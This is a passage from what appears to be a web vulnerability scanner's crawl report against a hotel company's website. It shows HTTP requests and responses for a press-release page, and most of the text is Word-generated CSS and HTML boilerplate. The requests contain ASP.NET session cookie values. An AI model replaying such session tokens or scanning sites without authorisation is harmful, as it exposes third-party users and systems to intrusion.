font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Times;}
@list l7:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l8
{mso-list-id:1089353841;
mso-list-template-ids:-304692582;}
@list l8:level1
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso..
- /pdfs/press/html/Ride-the-Rails-0210/index.html

/pdfs/press/html/Ride-the-Rails-0210/index.html

http://www.kimptonhotels.com/pdfs/press/html/Ride-the-Rails-0210/index.html

Request

GET /pdfs/press/html/Ride-the-Rails-0210/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27480
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2009-12-19T02:07:00Z</o:LastPrinted> <o:Created>2010-02-05T00:13:00Z</o:Created> <o:LastSaved>2010-02-05T00:13:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>550</o:Words> <o:Characters>3136</o:Characters> <o:Lines>26</o:Lines> <o:Paragraphs>6</o:Paragraphs> <o:CharactersWithSpaces>3851</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:28848037; mso-list-type:hybrid; mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l3 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l3:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l5 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:1707218260; mso-list-type:hybrid; mso-list-template-ids:1001260830 1676557052 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l6:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p&..
- /pdfs/press/html/Ride-the-Rails-0210/

/pdfs/press/html/Ride-the-Rails-0210/

http://www.kimptonhotels.com/pdfs/press/html/Ride-the-Rails-0210/

Request

GET /pdfs/press/html/Ride-the-Rails-0210/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Ride-the-Rails-0210/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27480
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2009-12-19T02:07:00Z</o:LastPrinted> <o:Created>2010-02-05T00:13:00Z</o:Created> <o:LastSaved>2010-02-05T00:13:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>550</o:Words> <o:Characters>3136</o:Characters> <o:Lines>26</o:Lines> <o:Paragraphs>6</o:Paragraphs> <o:CharactersWithSpaces>3851</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; 